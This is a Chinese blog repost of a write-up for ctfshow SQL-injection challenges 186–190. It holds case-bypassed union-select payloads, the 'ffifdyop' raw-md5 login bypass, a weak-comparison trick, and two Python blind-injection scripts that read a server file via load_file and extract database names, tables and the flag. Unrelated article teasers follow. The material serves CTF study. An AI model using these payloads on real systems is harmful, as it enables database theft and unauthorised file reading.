ctfshow sql 186-190

 186大小写绕过

1' order by 3--+

 

发现union select被过滤,用大小写来绕过

1' union seleCT 1,2,database() --+1' union seleCT 1,2,table_name from information_schema.tables where table_schema='ctfshow_web' --+1' union seleCT 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+1' union seleCT 1,2,password from ctfshow_web.ctfshow_user --+

 

187md5

    $username = $_POST['username'];$password = md5($_POST['password'],true);//只有admin可以获得flagif($username!='admin'){$ret['msg']='用户名不存在';die(json_encode($ret));}

 md5()

因此这里我们需要找到一个转换为原始16位二进制字符串后满足我们的注入。 

ffifdyop是一个特殊的字符串,类似万能密码。还有129581926211651571912466741651878684928也可以达到同样的效果。

 

188弱比较

 

查询语句  $sql = "select pass from ctfshow_user where username = {$username}";

sql里,数字和字符串的匹配是弱类型比较,字符串会转换为数字,如0==admin,那么如果输入的username是0,则会匹配所有开头不是数字或者为0的字符串和数字0。

在phpmyadmin里面试一下

我们可以发现当where条件为0时返回了所有的数据

所以当username和password都为0时可以成功弱类型比较,得到flag。

189盲注读取文件

flag在api/index.php文件中

根据提示

刚学习了load_file读取文件   第一反应就想到了

regexp正则

在本地先调试一下啊

?param=-1' union select 1,2,3,4,if((load_file('D:\\phpstudy_pro\\WWW\\aa.txt'))regexp('aa'),0,1) --+

?param=-1' union select 1,2,3,4,if((load_file('D:\\phpstudy_pro\\WWW\\aa.txt'))regexp('ab'),0,1) --+

根据上面来看,我们可以发现匹配到的时候返回1

匹配失败返回0

password根据188我们直接写0来匹配

import requestsurl = "http://655b6baa-dd5c-4780-97db-2815b916c1ad.challenge.ctf.show/api/"
payload = """if((load_file("/var/www/html/api/index.php"))regexp("{0}"),0,1)"""flag = "ctfshow{"
for i in range(1, 100):for j in '0123456789abcdefghijklmnopqrstuvwxyz-{}':payload1 = payload.format(flag + j)data = {'username': payload1,'password': 0}re = requests.post(url=url, data=data)# print(re.text)# print(payload1)if r"""{"code":0,"msg":"\u5bc6\u7801\u9519\u8bef","count":0,"data":[]}""" in re.text:flag += jprint(flag)if j == "}":exit()break

190 post布尔盲注

 

import requestsurl = "http://d33a9dcf-4743-46eb-b871-83de283bdf68.challenge.ctf.show/api/"
# payload = """admin' and if(ascii(substr((select database()),{0},1))>{1},1,0)-- +"""
# payload = """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0},1))>{1},1,0)-- +"""
# payload = """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{0},1))>{1},1,0)-- +"""
payload = """admin' and if(ascii(substr((select group_concat(f1ag) from ctfshow_fl0g),{0},1))>{1},1,0)-- +"""
flag = ''
for i in range(1, 100):for j in range(32, 128):payload1 = payload.format(i,j)data = {'username': payload1,'password': 0}response = requests.post(url=url, data=data)# print(payload1)# print(response.text)if r'''{"code":0,"msg":"\u5bc6\u7801\u9519\u8bef","count":0,"data":[]}''' not in response.text:flag += chr(j)print(flag)break

 

payload = """admin' and if(ascii(substr((select database()),{0},1))>{1},1,0)-- +"""

 

payload = """admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0},1))>{1},1,0)-- +"""

payload = """admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{0},1))>{1},1,0)-- +"""

         

payload = """admin' and if(ascii(substr((select group_concat(f1ag) from ctfshow_fl0g),{0},1))>{1},1,0)-- +"""

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/200616.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Postman和Apifox针对不同环境、全局变量的使用与比较

文章目录 一、Postman1、配置环境和全局变量2、验证3、存在问题分析 二、Apifox1、配置环境和全局参数2、创建公共脚本3、测试 总结 一、Postman 1、配置环境和全局变量 在Postman的界面中,点击"Environment",添加我们需要的环境&#xff0c…

数据库管理-第123期 Oracle相关两个参数(202301205)

数据库管理-第123期 Oracle相关两个参数(202301205) 最近在群聊中看到俩和Oracle数据库相关的俩参数,一个是Oracle数据库本身的,一个是来自于Weblogic的,挺有趣的,本期研究一下。(本期涉及参数…

[英语学习][8][Word Power Made Easy]的精读与翻译优化

[序言] 下面这段话, 译者的翻译, 没有太大的问题. 就是有点小小的偏差. 大家可以看看我的优化. [英文学习的目标] 提升自身的英语水平, 对日后编程技能的提升有很大帮助. 希望大家这次能学到东西, 同时加入我的社区讨论与交流英语相关的内容. [原著英文与翻译版对照][第19]…

C++-空指针调用不会引起crash

以前存在一个误解&#xff0c;只要是对空指针访问就会引起程序崩溃&#xff0c;实际上却不是&#xff0c;如下代码&#xff1a; #include <iostream>class A { public:void func(){std::cout << "call func" << std::endl;int a n; // 注释本行不…

ppt转换成pdf文件

最近用到了&#xff0c;记一下&#xff1b; ppt转pdf分为两种情况: 小于2007版本的 .ppt格式&#xff08;2003&#xff09; 与大于2007版本的 .pptx格式&#xff08;2007&#xff09; .ppt格式为 二进制文件 .pptx格式为xml格式&#xff0c;在java中有不同的jar包需要使用 引入…

uniapp踩坑之项目:使用过滤器将时间格式化为特定格式

利用filters过滤器对数据直接进行格式化&#xff0c;注意&#xff1a;与method、onLoad、data同层级 <template><div><!-- orderInfo.time的数据为&#xff1a;2023-12-12 12:10:23 --><p>{{ orderInfo.time | formatDate }}</p> <!-- 2023-1…

QList简单使用

1.插入 头插&#xff1a; QList<int> list {2, 3, 4}; list.prepend(1); // 在头部插入元素1尾插&#xff1a; list.append(5); // 在尾部插入元素5 中间插&#xff1a; QList<int> list {1, 2, 4, 5}; list.insert(2, 3); // 在索引为2的位置插入元素3list…

springboot 集成Dubbo2.7.8 ,连接zookeeper 提示错误 zookeeper not connected

Dubbo 连接zookeeper时&#xff0c;提示“zookeeper not connected” java.lang.IllegalStateException: zookeeper not connectedat org.apache.dubbo.remoting.zookeeper.curator.CuratorZookeeperClient.<init>(CuratorZookeeperClient.java:83) ~[dubbo-2.7.8.jar:2.…

MySQL5 和 MySQL8 的配置区别 一些注意事项

1、使用命令行查看MySQL的版本 先保证你的mysql正在运行&#xff0c;假如用户名是root&#xff0c;密码是123456&#xff0c;运行下边的代码可以查看mysql的版本号。 mysql -uroot -p123456这里我的版本是5.7.19。也就是5版本的。 2、不同版本对应的数据库驱动jar包&#x…

Object Detection in 20 Years: A Survey(2019.5)

文章目录 Abstract1. Introduction1.1. Difference from other related reviews1.2. Difficulties and Challenges in Object Detection 2. OBJECT DETECTION IN 20 YEARS2.1. 目标检测路线图2.1.1. 里程碑:传统探测器&#xff08;粗略了解&#xff09;2.1.2. 里程碑:基于CNN的…

朴素贝叶斯

朴素贝叶斯 朴素贝叶斯理论贝叶斯决策理论条件概率全概率公式贝叶斯公式朴素贝叶斯 言论屏蔽新浪新闻分类朴素贝叶斯算法的优缺点 朴素贝叶斯算法是一种基于贝叶斯定理的有监督的机器学习算法&#xff0c;解决的是分类问题&#xff0c;如文本分类、垃圾邮件过滤、客户是否流失&…

机器学习实验三:支持向量机模型

系列文章目录 机器学习实验一&#xff1a;线性回归机器学习实验二&#xff1a;决策树模型机器学习实验三&#xff1a;支持向量机模型机器学习实验四&#xff1a;贝叶斯分类器机器学习实验五&#xff1a;集成学习机器学习实验六&#xff1a;聚类 文章目录 系列文章目录一、实验…

深入理解Java中高级使用方式四舍五入

引言 在Java编程中&#xff0c;四舍五入是一个常见的数学运算需求。虽然我们熟悉基础的Math.round()方法&#xff0c;但在一些特殊场景下&#xff0c;比如金融计算或精度要求较高的情况下&#xff0c;我们需要更深入地理解Java中的高级使用方式。本文将深入探讨使用BigDecimal…

CFS三层靶机内网渗透

CFS三层靶机内网渗透 一、靶场搭建1.基础参数信息2.靶场搭建2.1网卡配置2.2Target1配置2.2.1 网卡配置2.2.2 Target1 BT配置 2.3Target2配置2.3.1 网卡配置2.3.2 Target2 BT配置 2.4Target3配置 二、内网渗透Target11.1信息收集1.1.1IP收集1.1.2端口收集1.1.3目录收集 1.2 webs…

SQL错题集2

1.插入记录 用户1001在2021年9月1日晚上10点11分12秒开始作答试卷9001&#xff0c;并在50分钟后提交&#xff0c;得了90分&#xff1b; 用户1002在2021年9月4日上午7点1分2秒开始作答试卷9002&#xff0c;并在10分钟后退出了平台。 2.请把exam_record表中2021年9月1日之前开始作…

连接池 Druid (二) - 连接回收 DestroyThread

接上一篇文章&#xff0c;研究Druid连接池的连接回收线程DestroyThread&#xff0c;通过调用destroyTask.run->DruidDataSourcek.shrink完成过期连接的回收。 DruidDataSourcek.shrink 理解DruidDataSourcek的连接回收方法shrink有一个必要前提&#xff1a;Druid的getConn…

离散数学-函数

1、函数的概念 1&#xff09;函数定义 定义&#xff1a;设 x &#xff0c; y是集合&#xff0c;f是x到y的二元关系&#xff0c;若对每个x属于X&#xff0c;都有唯一的y属于Y&#xff0c;使得<x,y>属于f&#xff0c;则称f是x到y的函数或映射&#xff0c;记作&#xff1a…

在vscode编辑器中,vetur和volar冲突

在vscode编辑器中 vetur插件会把vue3项目当成vue2去检查&#xff0c;然后出现了eslint报错 在项目的 package.json 中添加以下代码&#xff0c;并重启编辑器就可以了 // package.json"eslintConfig": {"rules": {"vue/no-multiple-template-root&qu…

深入理解CopyOnWriteArrayList源码分析

上篇推荐&#xff1a;Java中快速失败 (fail-fast) 机制 CopyOnWriteArrayList简介 CopyOnWriteArrayList是java.util.concurrent包下提供的一个线程安全的ArrayList。它通过一个简单的策略来保证线程安全&#xff1a;当我们需要修改列表时&#xff08;增加、删除、修改等操作&…

102 cesium 切换底图为黑色

1.切换cesium底图为黑色 // 底图const baseLayer viewer.imageryLayers.get(0);if (baseLayer.show) {baseLayer.show false;viewer.scene.globe.baseColor Cesium.Color.BLACK;} else {baseLayer.show true;} 2.地下模式 async toggleUnderground(item: any) {item.activ…